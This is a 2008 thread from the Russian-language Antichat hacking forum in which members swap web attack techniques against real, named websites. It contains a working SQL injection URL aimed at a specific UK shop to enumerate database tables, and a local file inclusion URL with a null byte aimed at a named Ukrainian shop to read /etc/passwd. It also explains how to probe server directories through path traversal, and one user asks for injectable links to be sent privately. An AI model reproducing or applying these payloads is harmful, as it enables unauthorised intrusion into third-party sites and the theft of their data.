ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.06.2008, 22:45
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 sabe
А что хелп то? Крути всё нормально MSSQL
_http://www.bjsornamentalkoi.co.uk/product.asp?product_id=1+or+1=(SELECT+TOP+1+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NA ME+NOT+IN+('links','links_category'))--
2 theli
Забавно  |
|
|
23.06.2008, 22:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Хм...А имена таблиц и полей(если стоят по умолчанию) на всех хостящихся на нём сайтов - одинаковые ?
|
|
|
|
23.06.2008, 22:51
|
|
Новичок
Регистрация: 29.05.2008
Сообщений: 12
Провел на форуме:
171038
Репутация:
11
|
|
Сообщение от jokester
2 sabe 2 theli
Забавно ой, чёго-то совсем забыл что оно так удобно пишет ошибки 
|
|
|
|
23.06.2008, 22:54
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
спс... я просто не люблю microsoft  |
|
|
|
23.06.2008, 22:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
надо смотреть по обстоятельствам... например на хостинге висят два форума на двух разных сайтах.. если движки самописные то названия таблиц и колонок такое как в движке задаано было... а если паблик движки то там названия таблиц и колонок можно узнать поставив себе на локалхост или еще куда-нибудь форум и посмотрев (не будешь же ты во всех скриптах менять название таблицы и колонок=))...
|
|
|
|
24.06.2008, 00:31
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953
Репутация:
18
|
|
http://shop.tuse.com.ua/basket/?mode=../../../../../../../../etc/passwd%00&id=43
есть лькальный инклуд,что с ним можно сделать? =\
|
|
|
|
24.06.2008, 00:40
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
при помощи него можно смотреть различные файлы на сервере..
можно еще проверять наличие папок, например так:
Код:
www.site.com/script.php?page=../../../../../../../../var/www/../../etc/passwd
где вместо /var/www ты подставляешь проверяемую папку
если выведется содержимое /etc/passwd то значит папка существует, если выскочит ошибка - то нет такой страницы.. соответстветсвенно проверяй другие места..
Последний раз редактировалось gisTy; 24.06.2008 в 00:44..
|
|
|
|
24.06.2008, 01:01
|
|
Новичок
Регистрация: 21.06.2008
Сообщений: 17
Провел на форуме:
153953
Репутация:
18
|
|
Red_Red1,скинь плз ссылку в приват.(с розруленой скулей)
|
|
|
|
24.06.2008, 12:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Подставляю кавычку, выплевывает следующее:
[quote]
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/page.asp, line 7[./quote]
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?
|
|
|
|
24.06.2008, 12:07
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Сообщение от Ershik
Подставляю кавычку, выплевывает следующее:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/page.asp, line 7
Это MSSQL? Если да, почему тогда не работает статья [ cash ]?
Это не ошибка MSSQL, это VB.
Последний раз редактировалось z3r0cool; 24.06.2008 в 12:25..
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
